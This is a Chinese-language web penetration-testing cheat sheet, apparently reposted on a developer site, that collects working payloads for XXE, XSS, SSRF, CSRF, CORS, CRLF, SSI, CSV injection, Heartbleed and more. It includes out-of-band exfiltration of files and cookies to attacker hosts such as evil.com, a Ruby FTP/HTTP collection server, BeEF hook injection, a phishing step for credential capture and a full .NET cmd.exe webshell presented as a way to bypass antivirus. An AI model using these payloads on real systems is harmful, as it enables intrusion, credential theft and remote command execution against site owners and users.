内容简介:发现post请求的接口的时候,可以这样试试:如果发现了一个错误:说明能够解析,试试读文件:
发现post请求的接口的时候,可以这样试试:
<?xml version="1.0"?> <!DOCTYPE a [ <!ENTITY test "THIS IS A STRING!"> ]> <methodCall><methodName>&test;</methodName></methodCall>
如果发现了一个错误:
<?xml version="1.0"?> <!DOCTYPE a [<!ENTITY test "nice string bro">] > <methodCall><methodName>&test;</methodName></methodCall>
说明能够解析,试试读文件:
<?xml version="1.0"?> <!DOCTYPE a [<!ENTITY test SYSTEM "file:///etc/passwd">] > <methodCall><methodName>&test;</methodName></methodCall>
或者用 php 伪协议:
<?xml version="1.0"?> <!DOCTYPE a [<!ENTITY test SYSTEM "php://filter/convert.base64-encode/resource=index.php">] > <methodCall><methodName>&test;</methodName></methodCall>
得到的结果再base64解码即可。
webgoat8
测试方法
试一试是否可以添加实体的评论:
<?xml version="1.0"?> <!DOCTYPE a [ <!ENTITY test "THIS IS A STRING!"> ]> <comment><text>&test;</text></comment>
可以的话,试试file:
<?xml version="1.0"?> <!DOCTYPE a [ <!ENTITY test SYSTEM "file:///etc/passwd"> ]> <comment><text>&test;</text></comment>
MUTILLIDAE
要获取mutillidae上的文件,要在form表单提交的过程中使用测试的payload:
<?xml version="1.0"?> <!DOCTYPE a [<!ENTITY TEST SYSTEM "file:///etc/passwd">] > <methodCall><methodName>&TEST;</methodName></methodCall>
或者把xml版本忽略掉:
<!DOCTYPE a [<!ENTITY TEST SYSTEM "file:///etc/passwd">] > <methodCall><methodName>&TEST;</methodName></methodCall>
以及上面提到的php流:
<!DOCTYPE a [<!ENTITY TEST SYSTEM "php://filter/convert.base64-encode/resource=phpinfo.php">] > <methodCall><methodName>&TEST;</methodName></methodCall>
OUT OF BAND
基础测试
copy the payload to clipboard
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "http://burp.collab.server" >]><foo>&xxe;</foo>
看看是否发送了请求
成功后,再利用其他payload
读文件
wing.xml
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE data [ <!ENTITY % file SYSTEM "file:///etc/lsb-release"> <!ENTITY % dtd SYSTEM "http://<evil attacker hostname>:8000/evil.dtd"> %dtd; ]> <data>&send;</data>
vps->evil.dtd
<!ENTITY % all "<!ENTITY send SYSTEM 'http://<evil attacker hostname>:8000/?collect=%file;'>"> %all;
host in dtd:
python -m SimpleHTTPServer 8000
使用FTP读文件
evil.xml
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE a [ <!ENTITY % asd SYSTEM "http://<evil attacker hostname>:8090/xxe_file.dtd"> %asd; %c; ]> <a>&rrr;</a>
将dtd文件放在VPS上:
<!ENTITY % d SYSTEM "file:///etc/passwd"> <!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://<evil attacker hostname>:2121/%d;'>">
ruby利用脚本:
require 'socket'
ftp_server = TCPServer.new 2121
http_server = TCPServer.new 8088
log = File.open( "xxe-ftp.log", "a")
payload = '<!ENTITY % asd SYSTEM "file:///etc/passwd">'
Thread.start do
loop do
Thread.start(http_server.accept) do |http_client|
puts "HTTP. New client connected"
loop {
req = http_client.gets()
break if req.nil?
if req.start_with? "GET"
http_client.puts("HTTP/1.1 200 OK\r\nContent-length: #{payload.length}\r\n\r\n#{payload}")
end
puts req
}
puts "HTTP. Connection closed"
end
end
end
Thread.start do
loop do
Thread.start(ftp_server.accept) do |ftp_client|
puts "FTP. New client connected"
ftp_client.puts("220 xxe-ftp-server")
loop {
req = ftp_client.gets()
break if req.nil?
puts "< "+req
log.write "get req: #{req.inspect}\n"
if req.include? "LIST"
ftp_client.puts("drwxrwxrwx 1 owner group 1 Feb 21 04:37 test")
ftp_client.puts("150 Opening BINARY mode data connection for /bin/ls")
ftp_client.puts("226 Transfer complete.")
elsif req.include? "USER"
ftp_client.puts("331 password please - version check")
elsif req.include? "PORT"
puts "! PORT received"
puts "> 200 PORT command ok"
ftp_client.puts("200 PORT command ok")
else
puts "> 230 more data please!"
ftp_client.puts("230 more data please!")
end
}
puts "FTP. Connection closed"
end
end
end
loop do
sleep(10000)
end
fuzz
https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/XXE-Fuzzing.txt
XSS
对于asp的站点,我们用unicode编码尖括号,适用于存储型XSS:
'%uff1cscript%uff1ealert('XSS');%uff1c/script%uff1e'
文件上传的XSS
发现上传点的时候,可以试试用payload作为文件名:
<img src=x onerror=alert('XSS')>.png
or:
"><img src=x onerror=alert('XSS')>.png
or:
"><svg onmouseover=alert(1)>.svg
SVG
stuff.svg
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert('XSS!');
</script>
</svg>
XML
<html> <head></head> <body> <something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script> </body> </html>
CSP BYPASS
script-src self: <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
常用的payload
-
svg/onload -
'-alert(1)-' -
eval(atob('YWxlcnQoMSk=')) -
<iMg SrC=x OnErRoR=alert(1)> -
<div onmouseover="alert('XSS');">
</Textarea/</Noscript/</Pre/</Xmp><Svg /Onload=confirm(document.domain)> -
- ```""[(!1+"")[3]+(!0+"")[2]+(''+{})[2]][(''+{})[5]+(''+{})[1]+((""[(!1+"")[3]+(!0+"")[2]+(''+{})[2]])+"")[2]+(!1+'')[3]+(!0+'')[0]+(!0+'')[1]+(!0+'')[2]+(''+{})[5]+(!0+'')[0]+(''+{})[1]+(!0+'')[1]](((!1+"")[1]+(!1+"")[2]+(!0+"")[3]+(!0+"")[1]+(!0+"")[0])+"(1)")() -
oNcliCk=alert(1)%20)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>%5Cx3csVg/<img/src/onerror=alert(2)>%5Cx3e
AUTH CRED
遇到http-only的时候:
使用钓鱼的基本身份验证获取其凭据
- 注册一个和目标类似的域名
- https://github.com/ryhanson/phishery
- 编译然后运行
- 设置payload—-
<img/src/onerror=document.location="https://evil.com/"> - 等待目标上线
可还行
偷Cookie
<img/src/onerror=document.location="http://evil.com:8090/cookiez.php?c="+document.cookie>
Blacklist bypass:
过滤了 //,:,",<和>
btoa('document.location="http://evil.com:8090/r.php?c="+document.cookie')
payload:
eval(atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9ldmlsLmNvbTo4MDkwL3IucGhwP2M9Iitkb2N1bWVudC5jb29raWU='))
另外一个:
<script>new Image().src="http://evil.com:8090/b.php?"+document.cookie;</script>
比较不错的一个payload:
<svg onload=fetch("//attacker/r.php?="%2Bcookie)>
nc 监听:
nc -lvp 8090
测试session劫持
利用burp重放功能进行测试。
看不同cookie会有什么变化。
FILTER BYPASS RESOURCES
收集到的payload:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet https://bittherapy.net/a-trick-to-bypass-an-xss-filter-and-execute-javascript/ https://support.portswigger.net/customer/portal/articles/2590820-bypassing-signature-based-xss-filters-modifying-script-code https://brutelogic.com.br/blog/avoiding-xss-detection/ https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec
基于POST的XSS
如果遇到无法将基于POST的XSS转换为GET请求的情况(可能目标服务器上禁用了GET请求),试试CSRF。
DOM XSS
<target.com>/#<img/src/onerror=alert("XSS")>
beef的hook,urlencode
<target.com>/#img/src/onerror=$("body").append(decodeURIComponent('%3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%3a%2f%2f%3c%65%76%69%6c%20%69%70%3e%3a%33%30%30%30%2f%68%6f%6f%6b%2e%6a%73%3e%3c%2f%73%63%72%69%70%74%3e'))>
#<img/src="1"/onerror=alert(1)>
#><img src=x onerror=prompt(1);>
这些站点有大量的xss payload
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS injection https://zseano.com/tutorials/4.html https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md http://www.smeegesec.com/2012/06/collection-of-cross-site-scripting-xss.html http://www.xss-payloads.com/payloads-list.html?a#category=all
payload生成:
xssor.io http://www.jsfuck.com/ https://github.com/aemkei/jsfuck https://convert.town/ascii-to-text http://jdstiles.com/java/cct.html
SSRF
在可以控制url参数的情况下,只要不重定向,就可以测试一下SSRF。
Webhooks, PDF 生成, 文档解析, 文件上传这些地方都可以重点关注一下。
PS: https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF
想办法探测内网资产: http://internal-server:22/notarealfile.txt
更换端口,查看回显,判断端口的开放。
没有回显的情况下,按照响应时间判断,以及DNSLOG,这玩意burp自带的也好用的。
根据我的经验,一些组件只能使用某些端口,例如80,8080,443等。最好对这些端口进行测试。
如果你的payload中有路径,最好带上&,#
http://internal-vulnerable-server/rce?cmd=wget%20attackers-machine:4000& http://internal-vulnerable-server/rce?cmd=wget%20attackers-machine:4000#
这篇文章对SOP和CORS以及SSRF都有很好的讲解:https//www.bishopfox.com/blog/2015/04/vulnerable-by-design-understanding-server-side-request-forgery/
Bug Bounty Write-ups:
https://hackerone.com/reports/115748 https://hackerone.com/reports/301924 https://www.sxcurity.pro/hackertarget/ http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html https://seanmelia.files.wordpress.com/2016/07/ssrf-to-pivot-internal-networks.pdf https://github.com/ngalongc/bug-bounty-reference#server-side-request-forgery-ssrf https://hack-ed.net/2017/11/07/a-nifty-ssrf-bug-bounty-write-up/
SQL注入
使用SQLMap在PUT REST Params中测试SQLi:
1. 使用 *标记Vulnerable参数 2. 复制请求并将其粘贴到文件中。 3. 用sqlmap运行: sqlmap -r <file with request> -vvvv
备忘录: https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
可以试试双编码输入。
会话固定
快速检查的方法,可用于确定会话固定漏洞是否是网站上的问题:
转到登录页面,观察未经身份验证的用户拥有的会话ID。 登录该站点。进入后,观察用户拥有的会话ID。如果会话ID与用户进行身份验证之前由站点提供的会话ID匹配,那么存在会话固定漏洞。
CSRF
一些绕过技术,即使有CSRF Token:
https://zseano.com/tutorials/5.htmlcsrf和reset api:
<html>
<script>
function jsonreq() {
var xmlhttp = new XMLHttpRequest();
xmlhttp.open("POST","https://target.com/api/endpoint", true);
xmlhttp.setRequestHeader("Content-Type","text/plain");
//xmlhttp.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
xmlhttp.withCredentials = true;
xmlhttp.send(JSON.stringify({"test":"x"}));
}
jsonreq();
</script>
</html>
案例:
https://blog.appsecco.com/exploiting-csrf-on-json-endpoints-with-flash-and-redirects-681d4ad6b31b http://c0rni3sm.blogspot.com/2018/01/1800-in-less-than-hour.html
CSRF TO REDECT XSS
<html>
<body>
<p>Please wait... ;)</p>
<script>
let host = 'http://target.com'
let beef_payload = '%3c%73%63%72%69%70%74%3e%20%73%3d%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%27%73%63%72%69%70%74%27%29%3b%20%73%2e%74%79%70%65%3d%27%74%65%78%74%2f%6a%61%76%61%73%63%72%69%70%74%27%3b%20%73%2e%73%72%63%3d%27%68%74%74%70%73%3a%2f%2f%65%76%69%6c%2e%63%6f%6d%2f%68%6f%6f%6b%2e%6a%73%27%3b%20%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%27%68%65%61%64%27%29%5b%30%5d%2e%61%70%70%65%6e%64%43%68%69%6c%64%28%73%29%3b%20%3c%2f%73%63%72%69%70%74%3e'
let alert_payload = '%3Cimg%2Fsrc%2Fonerror%3Dalert(1)%3E'
function submitRequest() {
var req = new XMLHttpRequest();
req.open(<CSRF components, which can easily be copied from Burp's POC generator>);
req.setRequestHeader("Accept", "*\/*");
req.withCredentials = true;
req.onreadystatechange = function () {
if (req.readyState === 4) {
executeXSS();
}
}
req.send();
}
function executeXSS() {
window.location.assign(host+'<URI with XSS>'+alert_payload);
}
submitRequest();
</script>
</body>
</html>
文件上传漏洞
在OS X上创建测试10g文件(对于测试文件上载限制很有用):
mkfile -n 10g temp_10GB_file
无限制的文件上传
资源:
http://nileshkumar83.blogspot.com/2017/01/file-upload-through-null-byte-injection.html
一些备忘录: https://github.com/jhaddix/tbhm
CORS配置错误
用于测试的POC:
<!DOCTYPE html>
<html>
<body>
<center>
<h2>CORS POC Exploit</h2>
<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>
<script>
function cors() {
var req = new XMLHttpRequest();
req.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
document.getElementById("demo").innerHTML = this.responseText;
// If you want to print something out after it finishes:
//alert(req.getAllResponseHeaders());
//alert(localStorage.access_token);
}
};
// If you need to set a header (you probably won't):
// req.setRequestHeader("header name", "value");
req.open("GET", "<site>", true);
req.withCredentials = true;
req.send();
}
</script>
</body>
</html>
资源:
https://www.securityninja.io/understanding-cross-origin-resource-sharing-cors/ http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html https://www.youtube.com/watch?v=wgkj4ZgxI4c http://ejj.io/misconfigured-cors/ https://www.youtube.com/watch?v=lg31RYYG-T4 https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS https://w3c.github.io/webappsec-cors-for-developers/#cors http://gerionsecurity.com/2013/11/cors-attack-scenarios/ Using CORS misconfiguration to steal a CSRF Token: https://yassineaboukir.com/blog/security-impact-of-a-misconfigured-cors-implementation/
测试心脏出血漏洞
nmap -d --script ssl-heartbleed --script-args vulns.showall -sV -p <port> <target ip> --script-trace -oA heartbleed-%y%m%d
偷私钥
wget https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py echo "<target>:<port>" > targets.txt python heartbleed.py -f targets.txt -v -e
wget https://raw.githubusercontent.com/sensepost/heartbleed-poc/master/heartbleed-poc.py python heartbleed-poc.py <target> -p <target port> | less
https://gist.github.com/bonsaiviking/10402038
https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py重定向
http://breenmachine.blogspot.com/2013/01/abusing-open-redirects-to-bypass-xss.html
重定向到beef:
<script> s=document.createElement('script'); s.type='text/javascript'; s.src='http://evil.com:3000/hook.js'; document.getElementsByTagName('head')[0].appendChild(s); </script>
使用Burp中的Decoder将其编码为base-64,并将其传递给payload:
data:text/html;base64,PHNjcmlwdD4gcz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTsgcy50eXBlPSd0ZXh0L2phdmFzY3JpcHQnOyBzLnNyYz0naHR0cDovL2V2aWwuY29tOjMwMDAvaG9vay5qcyc7IGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdoZWFkJylbMF0uYXBwZW5kQ2hpbGQocyk7IDwvc2NyaXB0Pg==
other:
http://;URL=javascript:alert('XSS')
data:text/html%3bbase64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20redirect
CRLF注入
当你看到请求的参数是这样:
http://inj.example.org/redirect.asp?origin=foo
回显是这样:
HTTP/1.1 302 Object moved Date: Mon, 07 Mar 2016 17:42:46 GMT Location: account.asp?origin=foo Connection: close Content-Length: 121 <head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>
尝试CRLF注射:
http://inj.example.org/redirect.asp?origin=foo%0d%0aSet-Cookie:%20ASPSESSIONIDACCBBTCD=SessionFixed%0d%0a
CRLF: %0d%0a
https://www.gracefulsecurity.com/http-header-injection/ https://www.owasp.org/index.php/Testing_for_HTTP_Splitting/Smuggling_(OTG-INPVAL-016) https://www.acunetix.com/websitesecurity/crlf-injection/ https://blog.innerht.ml/twitter-crlf-injection/
模板注入
您可以将一些代码放入jsfiddle以进行payload测试:
<html>
<head>
<meta charset="utf-8">
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.0/angular.js"></script>
</head>
<body>
<div ng-app>
{{constructor.constructor('alert(1)')()}}
</div>
</body>
</html>
http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html
RCE
使用WEBSHELL上传(.NET)绕过AV:
这是一个示例,其中包含fuzzdb项目中的一个webshell:
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
}
string executeIt(string arg)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
void cmdClick(object sender, System.EventArgs e)
{
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(executeIt(txtArg.Text)));
Response.Write("</pre>");
}
</script>
<HTML>
<HEAD>
<title>REALLY NICE</title>
</HEAD>
<body >
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="execute" OnClick="cmdClick"></asp:Button>
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
</form>
</body>
</HTML>
https://hax365.wordpress.com/2015/12/15/easy-trick-to-upload-a-web-shell-and-bypass-av-products/
PHP中的匿名函数RCE
$inputFunc = function() use($a, $b, $c, &$f){echo(exec('whoami'));};
PHP实验
如果您需要测试一些PHP代码,可以使用本机Web服务器来托管它:
php -S 127.0.0.1:80 -t .
PHP交互式SHELL
php -a
CSV注入
在Windows上的Excel中,输入以下内容以获取cmd shell:
=cmd|'cmd'!''
exmaple: https://rhinosecuritylabs.com/azure/cloud-security-risks-part-1-azure-csv-injection-vulnerability/
movie: https://www.youtube.com/watch?v=SC7AkclnG2g
有用的脚本
不断检查网站服务是否关闭:
while true; do /usr/bin/wget "http://[target]/uri/path" --timeout 30 -O - 2>/dev/null | grep "[item on page]" || echo "The site is down"; sleep 10; done
IDORS
服务器端包含注入
把它放在一个易受攻击的参数中:
如果有效,您应该在响应中看到当前日期和时间输出。
<!--#printenv --> :输出环境变量。
<!--#exec cmd="cat /etc/passwd"-->
more:
<pre><!--#exec cmd="ls" --></pre> <pre><!--#echo var="DATE_LOCAL" --> </pre> <pre><!--#exec cmd="whoami"--></pre> <pre><!--#exec cmd="dir" --></pre> <!--#exec cmd="ls" --> <!--#exec cmd="wget http://website.com/dir/shell.txt" --> <!--#exec cmd="/bin/ls /" --> <!--#exec cmd="dir" --> <!--#exec cmd="cd C:\WINDOWS\System32"> <!--#config errmsg="File not found, informs users and password"--> <!--#echo var="DOCUMENT_NAME" --> <!--#echo var="DOCUMENT_URI" --> <!--#config timefmt="A %B %d %Y %r"--> <!--#fsize file="ssi.shtml" --> <!--#include file=?UUUUUUUU...UU?--> <!--#echo var="DATE_LOCAL" --> <!--#exec cmd="whoami"--> <!--#printenv --> <!--#flastmod virtual="echo.html" --> <!--#echo var="auth_type" --> <!--#echo var="http_referer" --> <!--#echo var="content_length" --> <!--#echo var="content_type" --> <!--#echo var="http_accept_encoding" --> <!--#echo var="forwarded" --> <!--#echo var="document_uri" --> <!--#echo var="date_gmt" --> <!--#echo var="date_local" --> <!--#echo var="document_name" --> <!--#echo var="document_root" --> <!--#echo var="from" --> <!--#echo var="gateway_interface" --> <!--#echo var="http_accept" --> <!--#echo var="http_accept_charset" --> <!--#echo var="http_accept_language" --> <!--#echo var="http_connection" --> <!--#echo var="http_cookie" --> <!--#echo var="http_form" --> <!--#echo var="http_host" --> <!--#echo var="user_name" --> <!--#echo var="unique_id" --> <!--#echo var="tz" --> <!--#echo var="total_hits" --> <!--#echo var="server_software" --> <!--#echo var="server_protocol" --> <!--#echo var="server_port" --> <!--#echo var="server_name --> <!--#echo var="server_addr" --> <!--#echo var="server_admin" --> <!--#echo var="script_url" --> <!--#echo var="script_uri" --> <!--#echo var="script_name" --> <!--#echo var="script_filename" --> <!--#echo var="netsite_root" --> <!--#echo var="site_htmlroot" --> <!--#echo var="path_translated" --> <!--#echo var="path_info_translated" --> <!--#echo var="request_uri" --> <!--#echo var="request_method" --> <!--#echo var="remote_user" --> <!--#echo var="remote_addr" --> <!--#echo var="http_client_ip" --> <!--#echo var="remote_port" --> <!--#echo var="remote_ident" --> <!--#echo var="remote_host" --> <!--#echo var="query_string_unescaped" --> <!--#echo var="query_string" --> <!--#echo var="path_translated" --> <!--#echo var="path_info" --> <!--#echo var="path" --> <!--#echo var="page_count" --> <!--#echo var="last_modified" --> <!--#echo var="http_user_agent" --> <!--#echo var="http_ua_os" --> <!--#echo var="http_ua_cpu" -->
点击劫持
只需使用Burp的clickbandit。还要记住:Clickjacking适用于点击,而不适用于键盘。
poc:
<html>
<head>
<title>Clickjack test page</title>
</head>
<body>
<p>Website is vulnerable to clickjacking!</p>
<iframe src="http://target.com" width="500" height="500"></iframe>
</body>
</html>
https://www.owasp.org/index.php/Testing_for_Clickjacking_(OTG-CLIENT-009 )
https://javascript.info/clickjacking
https://www.tinfoilsecurity.com/blog/what-is-clickjacking攻击JSON
利用burp标记参数进行主动扫描
反序列化漏洞
Writeup on Oracle Weblogic CVE-2018-2628
Java Deserialization Scanner Burp Extension
Java Serialized Payloads Burp Extension工具
测试不安全的JWT
获取JSON Web Tokens Burp扩展 捕获请求,将其发送到Repeater 单击JSON Web Tokens选项卡 单击使用随机密钥对签名 单击Alg None Attack下的下拉菜单 单击Go 查看会话后是否仍然有效
以上所述就是小编给大家介绍的《Web Fuzz》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Coming of Age in Second Life
Tom Boellstorff / Princeton University Press / 2008-04-21 / USD 29.95
The gap between the virtual and the physical, and its effect on the ideas of personhood and relationships, is the most interesting aspect of Boellstorff's analysis... Boellstorff's portrayal of a virt......一起来看看 《Coming of Age in Second Life》 这本书的介绍吧!
JS 压缩/解压工具
在线压缩/解压 JS 代码
正则表达式在线测试
正则表达式在线测试